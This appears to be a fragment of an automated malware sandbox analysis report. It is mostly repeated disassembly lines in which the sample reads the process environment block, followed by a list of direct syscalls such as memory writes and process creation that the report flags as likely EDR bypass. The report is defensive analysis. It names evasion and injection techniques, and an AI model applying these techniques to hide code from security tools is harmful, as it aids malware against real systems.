Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011089B3 mov eax, dword ptr fs:[00000030h]	3_2_011089B3
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010809AD mov eax, dword ptr fs:[00000030h]	3_2_010809AD
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010809AD mov eax, dword ptr fs:[00000030h]	3_2_010809AD
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010929A0 mov eax, dword ptr fs:[00000030h]	3_2_010929A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010929A0 mov eax, dword ptr fs:[00000030h]	3_2_010929A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010929A0 mov eax, dword ptr fs:[00000030h]	3_2_010929A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010929A0 mov eax, dword ptr fs:[00000030h]	3_2_010929A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010929A0 mov eax, dword ptr fs:[00000030h]	3_2_010929A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010929A0 mov eax, dword ptr fs:[00000030h]	3_2_010929A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010929A0 mov eax, dword ptr fs:[00000030h]	3_2_010929A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010929A0 mov eax, dword ptr fs:[00000030h]	3_2_010929A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010929A0 mov eax, dword ptr fs:[00000030h]	3_2_010929A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010929A0 mov eax, dword ptr fs:[00000030h]	3_2_010929A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010929A0 mov eax, dword ptr fs:[00000030h]	3_2_010929A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010929A0 mov eax, dword ptr fs:[00000030h]	3_2_010929A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010929A0 mov eax, dword ptr fs:[00000030h]	3_2_010929A0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0114A9D3 mov eax, dword ptr fs:[00000030h]	3_2_0114A9D3
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_011169C0 mov eax, dword ptr fs:[00000030h]	3_2_011169C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0108A9D0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0108A9D0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0108A9D0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0108A9D0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0108A9D0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0108A9D0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B49D0 mov eax, dword ptr fs:[00000030h]	3_2_010B49D0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110E9E0 mov eax, dword ptr fs:[00000030h]	3_2_0110E9E0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B29F9 mov eax, dword ptr fs:[00000030h]	3_2_010B29F9
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B29F9 mov eax, dword ptr fs:[00000030h]	3_2_010B29F9
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110C810 mov eax, dword ptr fs:[00000030h]	3_2_0110C810
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112483A mov eax, dword ptr fs:[00000030h]	3_2_0112483A
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112483A mov eax, dword ptr fs:[00000030h]	3_2_0112483A
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BA830 mov eax, dword ptr fs:[00000030h]	3_2_010BA830
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A2835 mov eax, dword ptr fs:[00000030h]	3_2_010A2835
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A2835 mov eax, dword ptr fs:[00000030h]	3_2_010A2835
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A2835 mov eax, dword ptr fs:[00000030h]	3_2_010A2835
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A2835 mov ecx, dword ptr fs:[00000030h]	3_2_010A2835
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A2835 mov eax, dword ptr fs:[00000030h]	3_2_010A2835
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A2835 mov eax, dword ptr fs:[00000030h]	3_2_010A2835
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01084859 mov eax, dword ptr fs:[00000030h]	3_2_01084859
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01084859 mov eax, dword ptr fs:[00000030h]	3_2_01084859
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B0854 mov eax, dword ptr fs:[00000030h]	3_2_010B0854
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01116870 mov eax, dword ptr fs:[00000030h]	3_2_01116870
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01116870 mov eax, dword ptr fs:[00000030h]	3_2_01116870
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110E872 mov eax, dword ptr fs:[00000030h]	3_2_0110E872
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110E872 mov eax, dword ptr fs:[00000030h]	3_2_0110E872
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110C89D mov eax, dword ptr fs:[00000030h]	3_2_0110C89D
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01080887 mov eax, dword ptr fs:[00000030h]	3_2_01080887
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AE8C0 mov eax, dword ptr fs:[00000030h]	3_2_010AE8C0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0114A8E4 mov eax, dword ptr fs:[00000030h]	3_2_0114A8E4
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BC8F9 mov eax, dword ptr fs:[00000030h]	3_2_010BC8F9
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BC8F9 mov eax, dword ptr fs:[00000030h]	3_2_010BC8F9
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FEB1D mov eax, dword ptr fs:[00000030h]	3_2_010FEB1D
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FEB1D mov eax, dword ptr fs:[00000030h]	3_2_010FEB1D
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FEB1D mov eax, dword ptr fs:[00000030h]	3_2_010FEB1D
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FEB1D mov eax, dword ptr fs:[00000030h]	3_2_010FEB1D
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FEB1D mov eax, dword ptr fs:[00000030h]	3_2_010FEB1D
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FEB1D mov eax, dword ptr fs:[00000030h]	3_2_010FEB1D
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FEB1D mov eax, dword ptr fs:[00000030h]	3_2_010FEB1D
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FEB1D mov eax, dword ptr fs:[00000030h]	3_2_010FEB1D
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FEB1D mov eax, dword ptr fs:[00000030h]	3_2_010FEB1D
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AEB20 mov eax, dword ptr fs:[00000030h]	3_2_010AEB20
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AEB20 mov eax, dword ptr fs:[00000030h]	3_2_010AEB20
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01148B28 mov eax, dword ptr fs:[00000030h]	3_2_01148B28
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01148B28 mov eax, dword ptr fs:[00000030h]	3_2_01148B28
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112EB50 mov eax, dword ptr fs:[00000030h]	3_2_0112EB50
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01128B42 mov eax, dword ptr fs:[00000030h]	3_2_01128B42
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01116B40 mov eax, dword ptr fs:[00000030h]	3_2_01116B40
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01116B40 mov eax, dword ptr fs:[00000030h]	3_2_01116B40
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01134B4B mov eax, dword ptr fs:[00000030h]	3_2_01134B4B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01134B4B mov eax, dword ptr fs:[00000030h]	3_2_01134B4B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0107CB7E mov eax, dword ptr fs:[00000030h]	3_2_0107CB7E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01134BB0 mov eax, dword ptr fs:[00000030h]	3_2_01134BB0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01134BB0 mov eax, dword ptr fs:[00000030h]	3_2_01134BB0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090BBE mov eax, dword ptr fs:[00000030h]	3_2_01090BBE
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090BBE mov eax, dword ptr fs:[00000030h]	3_2_01090BBE
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A0BCB mov eax, dword ptr fs:[00000030h]	3_2_010A0BCB
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A0BCB mov eax, dword ptr fs:[00000030h]	3_2_010A0BCB
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A0BCB mov eax, dword ptr fs:[00000030h]	3_2_010A0BCB
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112EBD0 mov eax, dword ptr fs:[00000030h]	3_2_0112EBD0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01080BCD mov eax, dword ptr fs:[00000030h]	3_2_01080BCD
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01080BCD mov eax, dword ptr fs:[00000030h]	3_2_01080BCD
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01080BCD mov eax, dword ptr fs:[00000030h]	3_2_01080BCD
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110CBF0 mov eax, dword ptr fs:[00000030h]	3_2_0110CBF0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AEBFC mov eax, dword ptr fs:[00000030h]	3_2_010AEBFC
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01088BF0 mov eax, dword ptr fs:[00000030h]	3_2_01088BF0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01088BF0 mov eax, dword ptr fs:[00000030h]	3_2_01088BF0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01088BF0 mov eax, dword ptr fs:[00000030h]	3_2_01088BF0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0110CA11 mov eax, dword ptr fs:[00000030h]	3_2_0110CA11
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010AEA2E mov eax, dword ptr fs:[00000030h]	3_2_010AEA2E
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BCA24 mov eax, dword ptr fs:[00000030h]	3_2_010BCA24
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BCA38 mov eax, dword ptr fs:[00000030h]	3_2_010BCA38
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A4A35 mov eax, dword ptr fs:[00000030h]	3_2_010A4A35
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010A4A35 mov eax, dword ptr fs:[00000030h]	3_2_010A4A35
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090A5B mov eax, dword ptr fs:[00000030h]	3_2_01090A5B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01090A5B mov eax, dword ptr fs:[00000030h]	3_2_01090A5B
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01086A50 mov eax, dword ptr fs:[00000030h]	3_2_01086A50
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01086A50 mov eax, dword ptr fs:[00000030h]	3_2_01086A50
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01086A50 mov eax, dword ptr fs:[00000030h]	3_2_01086A50
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01086A50 mov eax, dword ptr fs:[00000030h]	3_2_01086A50
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01086A50 mov eax, dword ptr fs:[00000030h]	3_2_01086A50
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01086A50 mov eax, dword ptr fs:[00000030h]	3_2_01086A50
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01086A50 mov eax, dword ptr fs:[00000030h]	3_2_01086A50
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BCA6F mov eax, dword ptr fs:[00000030h]	3_2_010BCA6F
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BCA6F mov eax, dword ptr fs:[00000030h]	3_2_010BCA6F
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BCA6F mov eax, dword ptr fs:[00000030h]	3_2_010BCA6F
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0112EA60 mov eax, dword ptr fs:[00000030h]	3_2_0112EA60
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FCA72 mov eax, dword ptr fs:[00000030h]	3_2_010FCA72
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010FCA72 mov eax, dword ptr fs:[00000030h]	3_2_010FCA72
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108EA80 mov eax, dword ptr fs:[00000030h]	3_2_0108EA80
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108EA80 mov eax, dword ptr fs:[00000030h]	3_2_0108EA80
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108EA80 mov eax, dword ptr fs:[00000030h]	3_2_0108EA80
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108EA80 mov eax, dword ptr fs:[00000030h]	3_2_0108EA80
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108EA80 mov eax, dword ptr fs:[00000030h]	3_2_0108EA80
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108EA80 mov eax, dword ptr fs:[00000030h]	3_2_0108EA80
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108EA80 mov eax, dword ptr fs:[00000030h]	3_2_0108EA80
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108EA80 mov eax, dword ptr fs:[00000030h]	3_2_0108EA80
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0108EA80 mov eax, dword ptr fs:[00000030h]	3_2_0108EA80
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01154A80 mov eax, dword ptr fs:[00000030h]	3_2_01154A80
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B8A90 mov edx, dword ptr fs:[00000030h]	3_2_010B8A90
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01088AA0 mov eax, dword ptr fs:[00000030h]	3_2_01088AA0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01088AA0 mov eax, dword ptr fs:[00000030h]	3_2_01088AA0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010D6AA4 mov eax, dword ptr fs:[00000030h]	3_2_010D6AA4
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010D6ACC mov eax, dword ptr fs:[00000030h]	3_2_010D6ACC
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010D6ACC mov eax, dword ptr fs:[00000030h]	3_2_010D6ACC
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010D6ACC mov eax, dword ptr fs:[00000030h]	3_2_010D6ACC
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01080AD0 mov eax, dword ptr fs:[00000030h]	3_2_01080AD0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B4AD0 mov eax, dword ptr fs:[00000030h]	3_2_010B4AD0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B4AD0 mov eax, dword ptr fs:[00000030h]	3_2_010B4AD0
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BAAEE mov eax, dword ptr fs:[00000030h]	3_2_010BAAEE
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010BAAEE mov eax, dword ptr fs:[00000030h]	3_2_010BAAEE
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01138D10 mov eax, dword ptr fs:[00000030h]	3_2_01138D10
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01138D10 mov eax, dword ptr fs:[00000030h]	3_2_01138D10
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109AD00 mov eax, dword ptr fs:[00000030h]	3_2_0109AD00
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109AD00 mov eax, dword ptr fs:[00000030h]	3_2_0109AD00
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_0109AD00 mov eax, dword ptr fs:[00000030h]	3_2_0109AD00
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_010B4D1D mov eax, dword ptr fs:[00000030h]	3_2_010B4D1D
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01076D10 mov eax, dword ptr fs:[00000030h]	3_2_01076D10
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01076D10 mov eax, dword ptr fs:[00000030h]	3_2_01076D10
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01076D10 mov eax, dword ptr fs:[00000030h]	3_2_01076D10
Source: C:\Users\user\Desktop\zAg7xx1vKI.exe	Code function: 3_2_01108D20 mov eax, dword ptr fs:[00000030h]	3_2_01108D20

Source: C:\Users\user\Desktop\zAg7xx1vKI.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtOpenKeyEx: Direct from: 0x77672B9C	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtProtectVirtualMemory: Direct from: 0x77672F9C	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtCreateFile: Direct from: 0x77672FEC	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtOpenFile: Direct from: 0x77672DCC	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtTerminateThread: Direct from: 0x77672FCC	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtProtectVirtualMemory: Direct from: 0x77667B2E	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtQueryInformationToken: Direct from: 0x77672CAC	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtAllocateVirtualMemory: Direct from: 0x77672BEC	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtDeviceIoControlFile: Direct from: 0x77672AEC	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtQuerySystemInformation: Direct from: 0x776748CC	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtQueryAttributesFile: Direct from: 0x77672E6C	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtSetInformationThread: Direct from: 0x77672B4C	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtOpenSection: Direct from: 0x77672E0C	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtQueryVolumeInformationFile: Direct from: 0x77672F2C	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtAllocateVirtualMemory: Direct from: 0x776748EC	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtSetInformationThread: Direct from: 0x776663F9	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtReadVirtualMemory: Direct from: 0x77672E8C	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtCreateKey: Direct from: 0x77672C6C	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtClose: Direct from: 0x77672B6C
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtWriteVirtualMemory: Direct from: 0x7767490C	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtAllocateVirtualMemory: Direct from: 0x77673C9C	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtDelayExecution: Direct from: 0x77672DDC	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtCreateUserProcess: Direct from: 0x7767371C	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtQuerySystemInformation: Direct from: 0x77672DFC	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtQueryInformationProcess: Direct from: 0x77672C26	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtResumeThread: Direct from: 0x77672FBC	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtReadFile: Direct from: 0x77672ADC	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtAllocateVirtualMemory: Direct from: 0x77672BFC	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtResumeThread: Direct from: 0x776736AC	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtSetInformationProcess: Direct from: 0x77672C5C	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtMapViewOfSection: Direct from: 0x77672D1C	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtNotifyChangeKey: Direct from: 0x77673C2C	Jump to behavior
Source: C:\Program Files (x86)\ZswdqhvukCQQmJMbZgDmRewPaYNNKUWCeweVKOrpJhwKdsnZlUYLpDlEoBVeNJEUTmJmyPxDjKO\vMBXKWKIWTv.exe	NtWriteVirtualMemory: Direct from: 0x77672E3C	Jump to behavior
